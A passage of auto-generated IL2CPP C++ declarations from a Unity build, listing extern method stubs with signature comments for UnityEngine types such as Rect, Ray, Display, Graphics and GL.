extern void Bounds_Encapsulate_m1FCA57C58536ADB67B85A703470C6F5BFB837C2F (void);
// 0x00000140 System.Void UnityEngine.Bounds::Encapsulate(UnityEngine.Bounds)
extern void Bounds_Encapsulate_m7C70C382B9380A8C962074C78E189B53CE8F7A22 (void);
// 0x00000141 System.String UnityEngine.Bounds::ToString()
extern void Bounds_ToString_m1BCCCC8C6455A77DE5C964968C33305EF7A4A0D2 (void);
// 0x00000142 System.String UnityEngine.Bounds::ToString(System.String,System.IFormatProvider)
extern void Bounds_ToString_m085531A8E800327829FCD48DEA671A4A0B8D21CA (void);
// 0x00000143 UnityEngine.Vector3 UnityEngine.Plane::get_normal()
extern void Plane_get_normal_mA161D94E6F7327BC111007C880B76E1731729EFB (void);
// 0x00000144 System.Void UnityEngine.Plane::.ctor(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Plane__ctor_m2BFB65EBFF51123791878684ECC375B99FAD10A2 (void);
// 0x00000145 System.Boolean UnityEngine.Plane::Raycast(UnityEngine.Ray,System.Single&)
extern void Plane_Raycast_mC6D25A732413A2694A75CB0F2F9E75DEDDA117F0 (void);
// 0x00000146 System.String UnityEngine.Plane::ToString()
extern void Plane_ToString_mF0A98DAF2E4FA36A98B68F015A4DE507D8BB3B5A (void);
// 0x00000147 System.String UnityEngine.Plane::ToString(System.String,System.IFormatProvider)
extern void Plane_ToString_mE12B74C757E52A84BE921DF2E758A36E97A11DDA (void);
// 0x00000148 System.Void UnityEngine.Ray::.ctor(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Ray__ctor_mE298992FD10A3894C38373198385F345C58BD64C (void);
// 0x00000149 UnityEngine.Vector3 UnityEngine.Ray::get_origin()
extern void Ray_get_origin_m97604A8F180316A410DCD77B7D74D04522FA1BA6 (void);
// 0x0000014A UnityEngine.Vector3 UnityEngine.Ray::get_direction()
extern void Ray_get_direction_m21C2D22D3BD4A683BD4DC191AB22DD05F5EC2086 (void);
// 0x0000014B UnityEngine.Vector3 UnityEngine.Ray::GetPoint(System.Single)
extern void Ray_GetPoint_mAF4E1D38026156E6434EF2BED2420ED5236392AF (void);
// 0x0000014C System.String UnityEngine.Ray::ToString()
extern void Ray_ToString_m06274331D92120539B4C6E0D3747EE620DB468E5 (void);
// 0x0000014D System.String UnityEngine.Ray::ToString(System.String,System.IFormatProvider)
extern void Ray_ToString_mA76F7B86876505F674F3E20C18C8258103622C10 (void);
// 0x0000014E System.Void UnityEngine.Rect::.ctor(System.Single,System.Single,System.Single,System.Single)
extern void Rect__ctor_m18C3033D135097BEE424AAA68D91C706D2647F23 (void);
// 0x0000014F System.Void UnityEngine.Rect::.ctor(UnityEngine.Vector2,UnityEngine.Vector2)
extern void Rect__ctor_m503705FE0E4E413041E3CE7F09270489F401C675 (void);
// 0x00000150 System.Void UnityEngine.Rect::.ctor(UnityEngine.Rect)
extern void Rect__ctor_m5665723DD0443E990EA203A54451B2BB324D8224 (void);
// 0x00000151 UnityEngine.Rect UnityEngine.Rect::get_zero()
extern void Rect_get_zero_mBA92EC8F405CC95A0F1ED05E66D9ABD3A61B7476 (void);
// 0x00000152 UnityEngine.Rect UnityEngine.Rect::MinMaxRect(System.Single,System.Single,System.Single,System.Single)
extern void Rect_MinMaxRect_m6B16D975ED1728067570E5FAF474B430EC1F6430 (void);
// 0x00000153 System.Single UnityEngine.Rect::get_x()
extern void Rect_get_x_mB267B718E0D067F2BAE31BA477647FBF964916EB (void);
// 0x00000154 System.Void UnityEngine.Rect::set_x(System.Single)
extern void Rect_set_x_mAB91AB71898A20762BC66FD0723C4C739C4C3406 (void);
// 0x00000155 System.Single UnityEngine.Rect::get_y()
extern void Rect_get_y_mC733E8D49F3CE21B2A3D40A1B72D687F22C97F49 (void);
// 0x00000156 System.Void UnityEngine.Rect::set_y(System.Single)
extern void Rect_set_y_mDE91F4B98A6E8623EFB1250FF6526D5DB5855629 (void);
// 0x00000157 UnityEngine.Vector2 UnityEngine.Rect::get_position()
extern void Rect_get_position_m9B7E583E67443B6F4280A676E644BB0B9E7C4E38 (void);
// 0x00000158 System.Void UnityEngine.Rect::set_position(UnityEngine.Vector2)
extern void Rect_set_position_m9CD8AA25A83A7A893429C0ED56C36641202C3F05 (void);
// 0x00000159 UnityEngine.Vector2 UnityEngine.Rect::get_center()
extern void Rect_get_center_mAA9A2E1F058B2C9F58E13CC4822F789F42975E5C (void);
// 0x0000015A System.Void UnityEngine.Rect::set_center(UnityEngine.Vector2)
extern void Rect_set_center_m1BFC7584EEE9EF6C9AC2CA8459300FE23D5CE86F (void);
// 0x0000015B UnityEngine.Vector2 UnityEngine.Rect::get_min()
extern void Rect_get_min_mD0D1BABF9C955D2D9CCA86E257B0783ACDEE69AC (void);
// 0x0000015C System.Void UnityEngine.Rect::set_min(UnityEngine.Vector2)
extern void Rect_set_min_m6557D7D73C6F115CA7C92E38C88EA9E95FC89253 (void);
// 0x0000015D UnityEngine.Vector2 UnityEngine.Rect::get_max()
extern void Rect_get_max_m60149158D9A01113214BB417AA48CEF774899167 (void);
// 0x0000015E System.Void UnityEngine.Rect::set_max(UnityEngine.Vector2)
extern void Rect_set_max_mAD2D6D5DC1F5A6E69A0A0BD7E34C209F91C381F0 (void);
// 0x0000015F System.Single UnityEngine.Rect::get_width()
extern void Rect_get_width_m620D67551372073C9C32C4C4624C2A5713F7F9A9 (void);
// 0x00000160 System.Void UnityEngine.Rect::set_width(System.Single)
extern void Rect_set_width_m93B6217CF3EFF89F9B0C81F34D7345DE90B93E5A (void);
// 0x00000161 System.Single UnityEngine.Rect::get_height()
extern void Rect_get_height_mE1AA6C6C725CCD2D317BD2157396D3CF7D47C9D8 (void);
// 0x00000162 System.Void UnityEngine.Rect::set_height(System.Single)
extern void Rect_set_height_mD00038E6E06637137A5626CA8CD421924005BF03 (void);
// 0x00000163 UnityEngine.Vector2 UnityEngine.Rect::get_size()
extern void Rect_get_size_mFB990FFC0FE0152179C8C74A59E4AC258CB44267 (void);
// 0x00000164 System.Void UnityEngine.Rect::set_size(UnityEngine.Vector2)
extern void Rect_set_size_m346E4F7077E5A1C0F4E21966232CD726CB9E6BAA (void);
// 0x00000165 System.Single UnityEngine.Rect::get_xMin()
extern void Rect_get_xMin_mE89C40702926D016A633399E20DB9501E251630D (void);
// 0x00000166 System.Void UnityEngine.Rect::set_xMin(System.Single)
extern void Rect_set_xMin_mA873FCFAF9EABA46A026B73CA045192DF1946F19 (void);
// 0x00000167 System.Single UnityEngine.Rect::get_yMin()
extern void Rect_get_yMin_mB19848FB25DE61EDF958F7A22CFDD86DE103062F (void);
// 0x00000168 System.Void UnityEngine.Rect::set_yMin(System.Single)
extern void Rect_set_yMin_m9F780E509B9215A9E5826178CF664BD0E486D4EE (void);
// 0x00000169 System.Single UnityEngine.Rect::get_xMax()
extern void Rect_get_xMax_m2339C7D2FCDA98A9B007F815F6E2059BA6BE425F (void);
// 0x0000016A System.Void UnityEngine.Rect::set_xMax(System.Single)
extern void Rect_set_xMax_m97C28D468455A6D19325D0D862E80A093240D49D (void);
// 0x0000016B System.Single UnityEngine.Rect::get_yMax()
extern void Rect_get_yMax_mBC37BEE1CD632AADD8B9EAF9FE3BA143F79CAF8E (void);
// 0x0000016C System.Void UnityEngine.Rect::set_yMax(System.Single)
extern void Rect_set_yMax_mCF452040E0068A4B3CB15994C0B4B6AD4D78E04B (void);
// 0x0000016D System.Boolean UnityEngine.Rect::Contains(UnityEngine.Vector2)
extern void Rect_Contains_mAB270D6B7E3B0009A50D142C569D63E8FE59F48B (void);
// 0x0000016E System.Boolean UnityEngine.Rect::Contains(UnityEngine.Vector3)
extern void Rect_Contains_mB1160CD465F3E9616AA4EED72AFFD611BD8D2B6B (void);
// 0x0000016F UnityEngine.Rect UnityEngine.Rect::OrderMinMax(UnityEngine.Rect)
extern void Rect_OrderMinMax_m8E6ADD1C9B8B762FAAEA7D9C2CD72A0A57DEAAE9 (void);
// 0x00000170 System.Boolean UnityEngine.Rect::Overlaps(UnityEngine.Rect)
extern void Rect_Overlaps_m5A540A24DAD3327006A3A2E209CC17992173B572 (void);
// 0x00000171 System.Boolean UnityEngine.Rect::Overlaps(UnityEngine.Rect,System.Boolean)
extern void Rect_Overlaps_m3F0BA2C8BB81491978B21EB21C8A6D3BBED02E41 (void);
// 0x00000172 System.Boolean UnityEngine.Rect::op_Inequality(UnityEngine.Rect,UnityEngine.Rect)
extern void Rect_op_Inequality_m4698BE8DFFC2C4F79B03116FC33FE1BE823A8945 (void);
// 0x00000173 System.Boolean UnityEngine.Rect::op_Equality(UnityEngine.Rect,UnityEngine.Rect)
extern void Rect_op_Equality_m3592AA7AF3B2C809AAB02110B166B9A6F9263AD8 (void);
// 0x00000174 System.Int32 UnityEngine.Rect::GetHashCode()
extern void Rect_GetHashCode_m8E55539476EA6B7A6E0CEC5F980227CD15B778F1 (void);
// 0x00000175 System.Boolean UnityEngine.Rect::Equals(System.Object)
extern void Rect_Equals_mD7EB2046512E4A46524A7ED929F1C38A32C408F8 (void);
// 0x00000176 System.Boolean UnityEngine.Rect::Equals(UnityEngine.Rect)
extern void Rect_Equals_mE725DE506D3F1DB92F58B876BDA42AACD4D991B5 (void);
// 0x00000177 System.String UnityEngine.Rect::ToString()
extern void Rect_ToString_m7BF74645745862DA4751965D0899F94376F77F10 (void);
// 0x00000178 System.String UnityEngine.Rect::ToString(System.String,System.IFormatProvider)
extern void Rect_ToString_mA9EB8EC6A2E940240E0D0ECFA103B9B7EFB3D532 (void);
// 0x00000179 System.Int32 UnityEngine.RectInt::get_x()
extern void RectInt_get_x_mA1E7EF6DEAD2E900D7D56B7A3957C05081EBA9CA (void);
// 0x0000017A System.Void UnityEngine.RectInt::set_x(System.Int32)
extern void RectInt_set_x_m2D2F3A87E9899A29444DBDD0BB11CB19F13AA075 (void);
// 0x0000017B System.Int32 UnityEngine.RectInt::get_y()
extern void RectInt_get_y_m440422264E6FCAA91E01F81486A78037AC29D878 (void);
// 0x0000017C System.Void UnityEngine.RectInt::set_y(System.Int32)
extern void RectInt_set_y_m45D5C1D817698266BED66D41A705956A1571858D (void);
// 0x0000017D System.Int32 UnityEngine.RectInt::get_width()
extern void RectInt_get_width_m6B7B2FB764EAE83B7F63E7F77FA33973606761A7 (void);
// 0x0000017E System.Void UnityEngine.RectInt::set_width(System.Int32)
extern void RectInt_set_width_mCD96AA9D096114147F8411A340CE4AD3476DCD4C (void);
// 0x0000017F System.Int32 UnityEngine.RectInt::get_height()
extern void RectInt_get_height_mE25FB938714942D7A3BA0B3C21BC5CB913D5709C (void);
// 0x00000180 System.Void UnityEngine.RectInt::set_height(System.Int32)
extern void RectInt_set_height_m823A353A80B8B5180AEDF968A6E85B9D9B75C1C6 (void);
// 0x00000181 System.Int32 UnityEngine.RectInt::get_xMin()
extern void RectInt_get_xMin_mA5FB5AF1133380E080CF750D21327DE27EADEE1B (void);
// 0x00000182 System.Int32 UnityEngine.RectInt::get_yMin()
extern void RectInt_get_yMin_m6914C2254158DF797E20E381626DC08A2700147B (void);
// 0x00000183 System.Int32 UnityEngine.RectInt::get_xMax()
extern void RectInt_get_xMax_mBA05CE52847E3D3CB8295055706B3E0D4350E9F0 (void);
// 0x00000184 System.Int32 UnityEngine.RectInt::get_yMax()
extern void RectInt_get_yMax_mAE5D758A1241F7722F8FB9B46861583F76C8FE44 (void);
// 0x00000185 System.Void UnityEngine.RectInt::.ctor(System.Int32,System.Int32,System.Int32,System.Int32)
extern void RectInt__ctor_m6E8B3A6C7EE11257A6B438E36274116FE39B5B42 (void);
// 0x00000186 System.Boolean UnityEngine.RectInt::Overlaps(UnityEngine.RectInt)
extern void RectInt_Overlaps_m9E82E1C8BFDA3297221E5FDC8B8773AD3F50C4EE (void);
// 0x00000187 System.String UnityEngine.RectInt::ToString()
extern void RectInt_ToString_m7EC8BB4830459B8CF5BF3032E9A526A6EE18D386 (void);
// 0x00000188 System.String UnityEngine.RectInt::ToString(System.String,System.IFormatProvider)
extern void RectInt_ToString_m7EAE8CA8D77B7D6DDD46B61D670C71046006B92F (void);
// 0x00000189 System.Boolean UnityEngine.RectInt::Equals(UnityEngine.RectInt)
extern void RectInt_Equals_mE9EA164664CA30C1C099EFB658D691F55A793B96 (void);
// 0x0000018A System.Void UnityEngine.RectOffset::.ctor()
extern void RectOffset__ctor_m7DB8E8EDDB814824299F9EF661DAFA32854F0CC9 (void);
// 0x0000018B System.Void UnityEngine.RectOffset::.ctor(System.Object,System.IntPtr)
extern void RectOffset__ctor_m0711AF5DF27B8F3EC6CAF54755CDE46B76C00DBE (void);
// 0x0000018C System.Void UnityEngine.RectOffset::Finalize()
extern void RectOffset_Finalize_mF43E63CF652D658B255D033A099CAED2C4262FBC (void);
// 0x0000018D System.String UnityEngine.RectOffset::ToString()
extern void RectOffset_ToString_m8FAEA1A73C37F5827D0444EB4A8C5BA0781506F8 (void);
// 0x0000018E System.String UnityEngine.RectOffset::ToString(System.String,System.IFormatProvider)
extern void RectOffset_ToString_mEE066023D51F743F0370E3547E7145FAE86B00BC (void);
// 0x0000018F System.Void UnityEngine.RectOffset::Destroy()
extern void RectOffset_Destroy_mFFB78BB790E3BAFE464C29DB5F396FB2FA8E6E70 (void);
// 0x00000190 System.IntPtr UnityEngine.RectOffset::InternalCreate()
extern void RectOffset_InternalCreate_mCD8BEFDA09D5AF79BE01F71D4E92DFFF9064D88E (void);
// 0x00000191 System.Void UnityEngine.RectOffset::InternalDestroy(System.IntPtr)
extern void RectOffset_InternalDestroy_mF7D4125E6EED1E2CCDD563FA72EFDF800BC548F4 (void);
// 0x00000192 System.Int32 UnityEngine.RectOffset::get_left()
extern void RectOffset_get_left_mA406D7AFF76E48507EF143CDB1D157C4D5430D90 (void);
// 0x00000193 System.Void UnityEngine.RectOffset::set_left(System.Int32)
extern void RectOffset_set_left_mEE36418FAC0A5C5AA4A1C886C7CFF5D35AFAD2C0 (void);
// 0x00000194 System.Int32 UnityEngine.RectOffset::get_right()
extern void RectOffset_get_right_m07C826B0BC79B0CBC01F5FF489D456C553F047BF (void);
// 0x00000195 System.Void UnityEngine.RectOffset::set_right(System.Int32)
extern void RectOffset_set_right_m6D3608E0973F68CC0D0A6A9863D31D70972A9588 (void);
// 0x00000196 System.Int32 UnityEngine.RectOffset::get_top()
extern void RectOffset_get_top_m82E49FB93A5BD417131136F5A7DBA0F251F10263 (void);
// 0x00000197 System.Void UnityEngine.RectOffset::set_top(System.Int32)
extern void RectOffset_set_top_mEF389A8923A33EC2927AD13ADE00D960D4593207 (void);
// 0x00000198 System.Int32 UnityEngine.RectOffset::get_bottom()
extern void RectOffset_get_bottom_mDF9C1EC125F94245D5532C34FCFB65BE0F2A9D0B (void);
// 0x00000199 System.Void UnityEngine.RectOffset::set_bottom(System.Int32)
extern void RectOffset_set_bottom_mB303CE31F9932C3BE8A3FD48E5049D624F395C83 (void);
// 0x0000019A System.Int32 UnityEngine.RectOffset::get_horizontal()
extern void RectOffset_get_horizontal_m5C1795C027E4987A8532DC27D88FB3B9FFEC1352 (void);
// 0x0000019B System.Int32 UnityEngine.RectOffset::get_vertical()
extern void RectOffset_get_vertical_m43E46D9F313BB617044184A65350E6498A0709F0 (void);
// 0x0000019C UnityEngine.Rect UnityEngine.RectOffset::Remove(UnityEngine.Rect)
extern void RectOffset_Remove_mC21D85A2BA4D0246FEC0B6C5F3C2D293CD41DB3D (void);
// 0x0000019D System.Void UnityEngine.RectOffset::Remove_Injected(UnityEngine.Rect&,UnityEngine.Rect&)
extern void RectOffset_Remove_Injected_mEEE12EFCC02FDB71A8A65AF7A52EBD649968C2B0 (void);
// 0x0000019E System.Void UnityEngine.LightingSettings::LightingSettingsDontStripMe()
extern void LightingSettings_LightingSettingsDontStripMe_mA06509B760BA1A7DDB4CC3CE584DC2C3E1FE0237 (void);
// 0x0000019F System.Void UnityEngine.Gizmos::DrawLine(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Gizmos_DrawLine_m09F46DC2EA3C2200E465435A29960E8BCD84DD9C (void);
// 0x000001A0 System.Void UnityEngine.Gizmos::DrawCube(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Gizmos_DrawCube_mE7D2162786517A14E8A740C7887CD08A3105B192 (void);
// 0x000001A1 UnityEngine.Color UnityEngine.Gizmos::get_color()
extern void Gizmos_get_color_m47531920945B28B9338BC52BD651D56629D1E453 (void);
// 0x000001A2 System.Void UnityEngine.Gizmos::set_color(UnityEngine.Color)
extern void Gizmos_set_color_mFD4A7935FF025F5922374A8DD797BA0558BF1AD2 (void);
// 0x000001A3 System.Void UnityEngine.Gizmos::set_matrix(UnityEngine.Matrix4x4)
extern void Gizmos_set_matrix_m916F9A7A8ACC51F304BB5BB4536854A045EF844B (void);
// 0x000001A4 System.Void UnityEngine.Gizmos::DrawLine_Injected(UnityEngine.Vector3&,UnityEngine.Vector3&)
extern void Gizmos_DrawLine_Injected_mE5B3A0C9CAC003CA26C89CB592CCB1DBD93ABCB4 (void);
// 0x000001A5 System.Void UnityEngine.Gizmos::DrawCube_Injected(UnityEngine.Vector3&,UnityEngine.Vector3&)
extern void Gizmos_DrawCube_Injected_m77497D5FECD9ECA4120B61EFC99E0578772C12AB (void);
// 0x000001A6 System.Void UnityEngine.Gizmos::get_color_Injected(UnityEngine.Color&)
extern void Gizmos_get_color_Injected_m0067722BEA8E8003D9734859604031CC8B103F37 (void);
// 0x000001A7 System.Void UnityEngine.Gizmos::set_color_Injected(UnityEngine.Color&)
extern void Gizmos_set_color_Injected_m59A68156761584DF716824D898C0F86CDAFE85CD (void);
// 0x000001A8 System.Void UnityEngine.Gizmos::set_matrix_Injected(UnityEngine.Matrix4x4&)
extern void Gizmos_set_matrix_Injected_mB7E97361A6DA3EA60DB077BB4C604FB510E395E8 (void);
// 0x000001A9 System.Int32 UnityEngine.BeforeRenderOrderAttribute::get_order()
extern void BeforeRenderOrderAttribute_get_order_m70EDC4881AB025647CF1F01D8733F05097C05E29 (void);
// 0x000001AA System.Void UnityEngine.BeforeRenderOrderAttribute::set_order(System.Int32)
extern void BeforeRenderOrderAttribute_set_order_m3E4622CC00044C92D13296978F2429FD080617B9 (void);
// 0x000001AB System.Void UnityEngine.BeforeRenderOrderAttribute::.ctor(System.Int32)
extern void BeforeRenderOrderAttribute__ctor_mE8C92CA40D3B767DCBFEE8B1576835DB5D4D21D4 (void);
// 0x000001AC System.Int32 UnityEngine.BeforeRenderHelper::GetUpdateOrder(UnityEngine.Events.UnityAction)
extern void BeforeRenderHelper_GetUpdateOrder_mB4F29275F82F37A4D17F5C4243584685C5A66936 (void);
// 0x000001AD System.Void UnityEngine.BeforeRenderHelper::RegisterCallback(UnityEngine.Events.UnityAction)
extern void BeforeRenderHelper_RegisterCallback_m0C8CA4002EA46C819119E4680A78353A95D9A24B (void);
// 0x000001AE System.Void UnityEngine.BeforeRenderHelper::UnregisterCallback(UnityEngine.Events.UnityAction)
extern void BeforeRenderHelper_UnregisterCallback_m9E62642B0D26B57DDB7B6F7A354D5EC8CA2BB4F7 (void);
// 0x000001AF System.Void UnityEngine.BeforeRenderHelper::Invoke()
extern void BeforeRenderHelper_Invoke_m3CF1B83F9AA30342B05FB6F38B7909338B81C3F8 (void);
// 0x000001B0 System.Void UnityEngine.BeforeRenderHelper::.cctor()
extern void BeforeRenderHelper__cctor_mBB49EB68D5775626D48EBD2C1321D10C7C47503C (void);
// 0x000001B1 System.Void UnityEngine.CustomRenderTextureManager::InvokeOnTextureLoaded_Internal(UnityEngine.CustomRenderTexture)
extern void CustomRenderTextureManager_InvokeOnTextureLoaded_Internal_mF37BA06B50C53980AB49E0199E88BE7EF7FD5FF6 (void);
// 0x000001B2 System.Void UnityEngine.CustomRenderTextureManager::InvokeOnTextureUnloaded_Internal(UnityEngine.CustomRenderTexture)
extern void CustomRenderTextureManager_InvokeOnTextureUnloaded_Internal_m32EC14ACA09D2282C0920DB026C35D4F4D1EDA1D (void);
// 0x000001B3 System.Void UnityEngine.Display::.ctor()
extern void Display__ctor_mD4B0D1F494D3472058E47A940600FAC93D68D1DF (void);
// 0x000001B4 System.Void UnityEngine.Display::.ctor(System.IntPtr)
extern void Display__ctor_m0F78D1B697F3D82FFD274A6AA716E96FA6A4B156 (void);
// 0x000001B5 System.Int32 UnityEngine.Display::get_renderingWidth()
extern void Display_get_renderingWidth_mD23656E7A8270AF79B0EF4124959B3E18BEDF0C7 (void);
// 0x000001B6 System.Int32 UnityEngine.Display::get_renderingHeight()
extern void Display_get_renderingHeight_m0627691B7B2D7037A856597E43BFDF1F0CC2B0B8 (void);
// 0x000001B7 System.Int32 UnityEngine.Display::get_systemWidth()
extern void Display_get_systemWidth_m515BF32963F049A9710F11CE8F6445BAA63D7155 (void);
// 0x000001B8 System.Int32 UnityEngine.Display::get_systemHeight()
extern void Display_get_systemHeight_mC20ADD124FBEF94796F736684A3AF4D0AA569FC7 (void);
// 0x000001B9 UnityEngine.Vector3 UnityEngine.Display::RelativeMouseAt(UnityEngine.Vector3)
extern void Display_RelativeMouseAt_m978A03E5176C10A4A5CD1DEE6088FF7C3FE6EBBF (void);
// 0x000001BA UnityEngine.Display UnityEngine.Display::get_main()
extern void Display_get_main_m26EA95D6D963F024FE40479B466A2A965C872C08 (void);
// 0x000001BB System.Void UnityEngine.Display::RecreateDisplayList(System.IntPtr[])
extern void Display_RecreateDisplayList_mF33136978BFBD52AA140020D042C9F9842DD1225 (void);
// 0x000001BC System.Void UnityEngine.Display::FireDisplaysUpdated()
extern void Display_FireDisplaysUpdated_mF4A8B268D515EE547EFF9D7C82D5DF24E9F01335 (void);
// 0x000001BD System.Void UnityEngine.Display::GetSystemExtImpl(System.IntPtr,System.Int32&,System.Int32&)
extern void Display_GetSystemExtImpl_m349658ADE841804EEDC544B9F953A69906CF77A2 (void);
// 0x000001BE System.Void UnityEngine.Display::GetRenderingExtImpl(System.IntPtr,System.Int32&,System.Int32&)
extern void Display_GetRenderingExtImpl_m8449507E75D946208BF6ACADDF0D31DA28810BBE (void);
// 0x000001BF System.Int32 UnityEngine.Display::RelativeMouseAtImpl(System.Int32,System.Int32,System.Int32&,System.Int32&)
extern void Display_RelativeMouseAtImpl_m3935729A661E4480F22E6601FCBB9CB3FD5E055F (void);
// 0x000001C0 System.Void UnityEngine.Display::.cctor()
extern void Display__cctor_m1C213E7E81797389DA1B6DEFA6E8D884D8904F36 (void);
// 0x000001C1 System.Void UnityEngine.Display/DisplaysUpdatedDelegate::.ctor(System.Object,System.IntPtr)
extern void DisplaysUpdatedDelegate__ctor_mCF8A6ABE7CCC32908022E0AB13ED3BF1EBD2719D (void);
// 0x000001C2 System.Void UnityEngine.Display/DisplaysUpdatedDelegate::Invoke()
extern void DisplaysUpdatedDelegate_Invoke_m4E0A3493E2C3A9CE0D5B5B3FD40A8389BFBA1853 (void);
// 0x000001C3 System.Int32 UnityEngine.Screen::get_width()
extern void Screen_get_width_mCA5D955A53CF6D29C8C7118D517D0FC84AE8056C (void);
// 0x000001C4 System.Int32 UnityEngine.Screen::get_height()
extern void Screen_get_height_m624DD2D53F34087064E3B9D09AC2207DB4E86CA8 (void);
// 0x000001C5 System.Single UnityEngine.Screen::get_dpi()
extern void Screen_get_dpi_mD5BB95E605FABD335F0D4736EE4860A0AA98A50D (void);
// 0x000001C6 UnityEngine.ScreenOrientation UnityEngine.Screen::GetScreenOrientation()
extern void Screen_GetScreenOrientation_mBC2B37244D3EEAF6C1892EFC20EF70B1A2B583A3 (void);
// 0x000001C7 UnityEngine.ScreenOrientation UnityEngine.Screen::get_orientation()
extern void Screen_get_orientation_m7B47A2719DDE296357BB3199AB3BECC49F9F4A6D (void);
// 0x000001C8 UnityEngine.FullScreenMode UnityEngine.Screen::get_fullScreenMode()
extern void Screen_get_fullScreenMode_m9651FE8CD208A00D617869E4CAB43607AD9FA23D (void);
// 0x000001C9 System.Int32 UnityEngine.Graphics::Internal_GetMaxDrawMeshInstanceCount()
extern void Graphics_Internal_GetMaxDrawMeshInstanceCount_m5CC9F58628E50EDDFBE2BFB4AA1575A3DE3B8F50 (void);
// 0x000001CA System.Void UnityEngine.Graphics::Internal_SetNullRT()
extern void Graphics_Internal_SetNullRT_m90451387CC2DFCC7E980490CE95AEFD39125C26C (void);
// 0x000001CB System.Void UnityEngine.Graphics::Internal_SetRTSimple(UnityEngine.RenderBuffer,UnityEngine.RenderBuffer,System.Int32,UnityEngine.CubemapFace,System.Int32)
extern void Graphics_Internal_SetRTSimple_m779C3154F1B58E2D0D21D4C2581EA995FDFB2645 (void);
// 0x000001CC System.Void UnityEngine.Graphics::Internal_DrawTexture(UnityEngine.Internal_DrawTextureArguments&)
extern void Graphics_Internal_DrawTexture_m62C76541D5AB3EC902860463D1F43FA44862E296 (void);
// 0x000001CD System.Void UnityEngine.Graphics::SetRenderTargetImpl(UnityEngine.RenderBuffer,UnityEngine.RenderBuffer,System.Int32,UnityEngine.CubemapFace,System.Int32)
extern void Graphics_SetRenderTargetImpl_m5C1AED9F0899EA1E3ADC8E603C33C40C18F068CB (void);
// 0x000001CE System.Void UnityEngine.Graphics::SetRenderTargetImpl(UnityEngine.RenderTexture,System.Int32,UnityEngine.CubemapFace,System.Int32)
extern void Graphics_SetRenderTargetImpl_m8EF3E3715EE1BC29C43582B5ADF3113A9DD924AB (void);
// 0x000001CF System.Void UnityEngine.Graphics::SetRenderTarget(UnityEngine.RenderTexture,System.Int32,UnityEngine.CubemapFace,System.Int32)
extern void Graphics_SetRenderTarget_m4694FD3731085B938B250B221EC16FB819180508 (void);
// 0x000001D0 System.Void UnityEngine.Graphics::SetRenderTarget(UnityEngine.RenderTexture)
extern void Graphics_SetRenderTarget_mDA2F41245400E50551268368F6C551FFFDCC9CAC (void);
// 0x000001D1 System.Void UnityEngine.Graphics::.cctor()
extern void Graphics__cctor_m5475D3DC1FFB320D807D63A44D5B69150811ED7D (void);
// 0x000001D2 System.Void UnityEngine.Graphics::Internal_SetRTSimple_Injected(UnityEngine.RenderBuffer&,UnityEngine.RenderBuffer&,System.Int32,UnityEngine.CubemapFace,System.Int32)
extern void Graphics_Internal_SetRTSimple_Injected_m3EA42AD141410129D9229427AA0B4B94B18C2BA2 (void);
// 0x000001D3 System.Void UnityEngine.GL::Vertex3(System.Single,System.Single,System.Single)
extern void GL_Vertex3_m9FFEDAB32CC9A54F1BF7572D0CE856AE41A6473F (void);
// 0x000001D4 System.Void UnityEngine.GL::Vertex(UnityEngine.Vector3)
extern void GL_Vertex_m343A1E85A377F4107C5A9BDDBBF1D3E181997C59 (void);
// 0x000001D5 System.Void UnityEngine.GL::TexCoord3(System.Single,System.Single,System.Single)
extern void GL_TexCoord3_m34D6FE6E9AFF2A1DC7F0DA57DF386AEB58C59DAA (void);
// 0x000001D6 System.Void UnityEngine.GL::TexCoord2(System.Single,System.Single)
extern void GL_TexCoord2_m53885A6C83E3B67A8B06D30D595267BC07231339 (void);
// 0x000001D7 System.Void UnityEngine.GL::ImmediateColor(System.Single,System.Single,System.Single,System.Single)
extern void GL_ImmediateColor_mAB5F99894E5FC32F9FC0613215C9E5EE54628771 (void);
// 0x000001D8 System.Void UnityEngine.GL::Color(UnityEngine.Color)
extern void GL_Color_mF6C9058C9552C5E26A15FBB7061BEB5E78C7D3D8 (void);
// 0x000001D9 System.Void UnityEngine.GL::SetViewMatrix(UnityEngine.Matrix4x4)
extern void GL_SetViewMatrix_m9175011F5A2A5C2D14BEC0049DDB4CC5F1AA7225 (void);
// 0x000001DA System.Void UnityEngine.GL::set_modelview(UnityEngine.Matrix4x4)
extern void GL_set_modelview_mEBE03EB4470FB1A9DAFB7992099BBC45D711968D (void);
// 0x000001DB System.Void UnityEngine.GL::PushMatrix()
extern void GL_PushMatrix_m16E696D17AE7C402C63C1C9068E5405C4B37C16C (void);
// 0x000001DC System.Void UnityEngine.GL::PopMatrix()
extern void GL_PopMatrix_m4AF6773C7BF85E8EEEC5CF36D5AFCCAC0FA34531 (void);
// 0x000001DD System.Void UnityEngine.GL::LoadOrtho()
extern void GL_LoadOrtho_m0690AE9736A807C9D662FDB9D9A58CC5D6ECA510 (void);
// 0x000001DE System.Void UnityEngine.GL::LoadPixelMatrix()
extern void GL_LoadPixelMatrix_mFF4AF040DE14CAE70A84D42BFEE0DB6866E89B46 (void);
// 0x000001DF System.Void UnityEngine.GL::LoadProjectionMatrix(UnityEngine.Matrix4x4)
extern void GL_LoadProjectionMatrix_m50BB4BC12EC636964C60C0DBBC4D5777706B00E4 (void);
// 0x000001E0 System.Void UnityEngine.GL::GLLoadPixelMatrixScript(System.Single,System.Single,System.Single,System.Single)
extern void GL_GLLoadPixelMatrixScript_mCD2CBCC79E798959B19A399DD6A10359ADEEE1EE (void);
// 0x000001E1 System.Void UnityEngine.GL::LoadPixelMatrix(System.Single,System.Single,System.Single,System.Single)
extern void GL_LoadPixelMatrix_m4E6F7BAFD87A2FE91048B0F602519811690CAA63 (void);
// 0x000001E2 System.Void UnityEngine.GL::GLIssuePluginEvent(System.IntPtr,System.Int32)
extern void GL_GLIssuePluginEvent_mA86C1C8B50DA232120C3BF0BD26EC283C1FB62C0 (void);
// 0x000001E3 System.Void UnityEngine.GL::IssuePluginEvent(System.IntPtr,System.Int32)
extern void GL_IssuePluginEvent_m6F9EC530F81DC4DB91A09B4F9F730B013C6929EF (void);
// 0x000001E4 System.Void UnityEngine.GL::Begin(System.Int32)
extern void GL_Begin_m484E517466FBE5D4AE78DAC608E403159A57BD10 (void);
// 0x000001E5 System.Void UnityEngine.GL::End()
extern void GL_End_m804EE4091F69FC2F6B764371D327CFCB28884550 (void);
// 0x000001E6 System.Void UnityEngine.GL::GLClear(System.Boolean,System.Boolean,UnityEngine.Color,System.Single)
